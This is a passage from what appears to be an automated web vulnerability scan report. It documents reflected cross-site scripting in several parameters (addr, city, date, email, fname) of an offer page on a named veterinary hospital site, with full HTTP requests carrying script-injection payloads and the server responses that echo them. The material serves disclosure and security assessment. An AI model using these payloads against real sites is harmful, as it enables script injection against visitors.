GET /main/offer?addr=d4e30"><script>alert(1)</script>0f7c5167de6 &city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:48 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ceoonhufna4nqjnbadvlk4olp2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=d4e30"><script>alert(1)</script>0f7c5167de6 &city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&sub...[SNIP]...
2.22. http://www.vcahospitals.com/main/offer [city parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5398c"><script>alert(1)</script>87df2a8d4cb was submitted in the city parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=5398c"><script>alert(1)</script>87df2a8d4cb &date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=7lu4jl5rh2o7n9k5h17md6nq97; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=5398c"><script>alert(1)</script>87df2a8d4cb &date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Ge...[SNIP]...
2.23. http://www.vcahospitals.com/main/offer [date parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the date request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5640a"><script>alert(1)</script>ae7e41b90f2 was submitted in the date parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=13070844005640a"><script>alert(1)</script>ae7e41b90f2 &email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:00 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=1ggd6ft9v06ns03acajkmsv7l1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=13070844005640a"><script>alert(1)</script>ae7e41b90f2 &email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&to...[SNIP]...
2.24. http://www.vcahospitals.com/main/offer [email parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 301c8"><script>alert(1)</script>a34d170cc15 was submitted in the email parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=1307084400&email=301c8"><script>alert(1)</script>a34d170cc15 &fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=70e0blfdjoh05e8704s1uokj93; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=301c8"><script>alert(1)</script>a34d170cc15 &fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa1...[SNIP]...
2.25. http://www.vcahospitals.com/main/offer [fname parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c92a"><script>alert(1)</script>7d4cd1323ce was submitted in the fname parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=1307084400&email=&fname=6c92a"><script>alert(1)</script>7d4cd1323ce &formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
